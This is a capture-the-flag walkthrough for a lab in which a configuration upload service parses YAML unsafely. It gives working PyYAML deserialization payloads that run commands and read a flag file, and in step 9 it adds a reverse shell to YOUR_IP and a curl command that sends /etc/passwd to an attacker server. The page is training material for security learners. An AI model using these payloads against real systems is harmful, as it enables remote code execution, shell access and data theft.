YAML Bomb

💣 Can you detonate a YAML bomb to compromise the configuration system?

Challenge 23 Nov 2025 Pro Exclusive Solution Available

This corporate configuration management system processes YAML files for application settings, but a dangerous implementation flaw creates a perfect storm for exploitation. 💣 YAML deserialization attacks are increasingly common in modern applications, especially those using configuration-as-code approaches. Many developers don't realize that YAML can execute arbitrary Python code during parsing, making it a powerful attack vector for system compromise! 🎯

Flags

Points

70%

Success Rate

Start Your Challenge

~1-2 min setup

Dedicated server

Private instance

Industry standard

This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Challenge

💣 YAML Bomb - Complete Solution

Objective: Exploit YAML deserialization vulnerability in a configuration management system to achieve remote code execution and retrieve the system flag.

🔍 Step 1: Application Discovery

Access the configuration management portal and explore its functionality:

curl http://<target-ip>/

The application provides a YAML configuration upload and processing feature for managing application settings.

🔍 Step 2: YAML Processing Analysis

Examine the configuration upload functionality at /upload endpoint:

curl -X POST http://<target-ip>/upload -F "config=@test.yaml"

The application processes YAML files and displays parsed configuration data, indicating YAML deserialization.

🔍 Step 3: Unsafe YAML Loading Detection

Test for unsafe YAML loading by creating a basic YAML file with Python object references:

# Method 1: Use single quotes to avoid shell history expansion
echo 'test: !!python/object/apply:os.system ["echo vulnerable"]' > test.yaml

# Method 2: Use heredoc for complex YAML
cat > test.yaml << 'EOF'
test: !!python/object/apply:os.system
  - ["echo vulnerable"]
EOF

# Upload and test
curl -X POST http://<target-ip>/upload -F "config=@test.yaml"

If the application executes the command, it confirms yaml.load() is being used instead of yaml.safe_load().

🔍 Step 4: Basic Code Execution Payload

Create a YAML payload that executes system commands:

!!python/object/apply:subprocess.check_output
- ['id']

This payload uses PyYAML's object instantiation to execute the id command and return output.

🔍 Step 5: Flag Location Discovery

Use YAML deserialization to explore the file system and locate the flag:

# Method 1: Check common flag locations
!!python/object/apply:subprocess.check_output
- ['ls', '-la', '/flag.txt']

# Method 2: Search for flag files with better patterns
!!python/object/apply:subprocess.getoutput
- 'find / -name "flag.txt" -o -name "*.flag" -o -name "flag" 2>/dev/null | head -10'

# Method 3: Check multiple common flag locations
!!python/object/apply:subprocess.getoutput
- 'ls -la /flag.txt /root/flag.txt /home/*/flag.txt /tmp/flag.txt 2>/dev/null'

This searches for files containing "flag" in their name across the filesystem.

🔍 Step 6: Flag Extraction

Create a YAML payload to read the flag file once located:

!!python/object/apply:subprocess.check_output
- ['cat', '/flag.txt']

The application processes the YAML and executes the cat command, returning the flag content.

🔍 Step 7: Alternative Payload Methods

Multiple approaches can be used for YAML deserialization attacks:

# Method 1: Using subprocess.getoutput (returns output)
!!python/object/apply:subprocess.getoutput
- 'cat /flag.txt'

# Method 2: Using eval
!!python/object/apply:eval
- 'open("/flag.txt").read()'

# Method 3: Using subprocess.check_output (alternative)
!!python/object/apply:subprocess.check_output
- ['cat', '/flag.txt']

🔍 Step 8: Complete Exploitation Workflow

Full exploitation process using curl and YAML payloads:

# Create malicious YAML file
cat > exploit.yaml << 'EOF'
config_name: "System Configuration"
settings:
  database:
    host: "localhost"
    port: 5432
  exploit: !!python/object/apply:subprocess.check_output
    - ['cat', '/flag.txt']
EOF

# Upload and execute
curl -X POST http://<target-ip>/upload -F "config=@exploit.yaml"

🔍 Step 9: Advanced YAML Bomb Techniques

More sophisticated YAML deserialization payloads:

# Reverse shell payload
!!python/object/apply:os.system
- 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])"'

# File exfiltration
!!python/object/apply:subprocess.check_output
- ['curl', '-X', 'POST', '-d', '@/etc/passwd', 'http://YOUR_SERVER/exfil']

🔍 Step 10: Verification and Flag Submission

Verify successful exploitation by confirming flag extraction:

# The flag should be returned in the application response
# Look for UUID format: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

The flag will be displayed in the configuration processing results as a UUID string.

🛡️ Security Implications

YAML deserialization vulnerabilities demonstrate the critical importance of using safe parsing methods (yaml.safe_load()) instead of unsafe ones (yaml.load()) when processing untrusted YAML data. This attack vector is particularly dangerous in configuration management systems and CI/CD pipelines.